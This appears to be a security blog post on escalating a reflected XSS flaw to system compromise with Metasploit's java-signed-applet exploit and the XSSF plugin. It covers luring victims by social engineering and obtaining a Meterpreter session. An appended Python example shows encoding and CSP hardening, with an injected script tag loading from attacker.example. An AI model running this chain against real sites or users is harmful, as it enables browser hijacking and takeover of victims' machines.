Most of the time an XSS vulnerability is misunderstood by security researchers, or even ignored with the claim that it has little or no impact. The credit for this blog post actually goes to SQLi: while looking for SQL injection I found this XSS flaw in that particular website, and it can even lead to system compromise if the browser or any of its components are vulnerable.

For exploiting this vulnerability I used the Metasploit Framework and the Cross-Site Scripting Framework (XSSF), a security tool designed to make XSS exploitation much easier. It lets us create a communication channel with the victim's browser and helps carry out further attacks.

1) Use the java-signed-applet exploit and remember the job id for later use. You can use any other exploit, depending on the scenario and the target.

2) Load the XSSF plugin in msfconsole. Type ? to see the various options.

3) Type xssf_urls to see the useful URLs.

4) Embed the link in your vulnerable XSS script and send it to the victim. You can also deliver the link through social engineering.

5) The user gets a prompt to run the JavaScript; since it is Java asking for permission to run, most users will simply click yes. Once the user clicks on the link, the system details are logged on the attacker's server along with the current session id.

You can attack multiple targets at once using XSSF. It has a graphical version as well; just open the help URL to see the victim list in your browser.

Then look at the active sessions and get the Meterpreter session for that victim machine.
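The whole chain above starts with one reflected parameter being written into the page unencoded. As an added example, not code from the original post, here is a minimal vulnerable renderer beside its hardened form: HTML-encoding the reflected value stops the injected tag from being parsed as markup, and a Content-Security-Policy header (assumed values, adjust to the site) refuses inline or third-party scripts and plugin objects such as applets even if an encoding is missed. The injected string is constructed for illustration.

```python
import html

# Constructed sample: an attacker-controlled "name" parameter carrying a remote script tag.
INJECTED = '<script src="http://attacker.example/loader.js"></script>'


def render_vulnerable(name: str) -> str:
    """Reflects the parameter into the page unencoded: any markup in it is executed."""
    return f"<h1>Hello {name}</h1>"


def render_hardened(name: str) -> str:
    """HTML-encodes the reflected value so the browser treats it as text, not markup."""
    return f"<h1>Hello {html.escape(name, quote=True)}</h1>"


def csp_headers() -> dict:
    """Defence in depth (assumed policy): no inline scripts, no scripts from other
    origins, and no <object>/<embed>/<applet> content, so a missed encoding cannot
    load a remote hook script or a plugin-based payload."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'"
    }


def contains_script_tag(page: str) -> bool:
    """Quick check a reviewer can run over rendered output: is a raw <script tag present?"""
    return "<script" in page.lower()
```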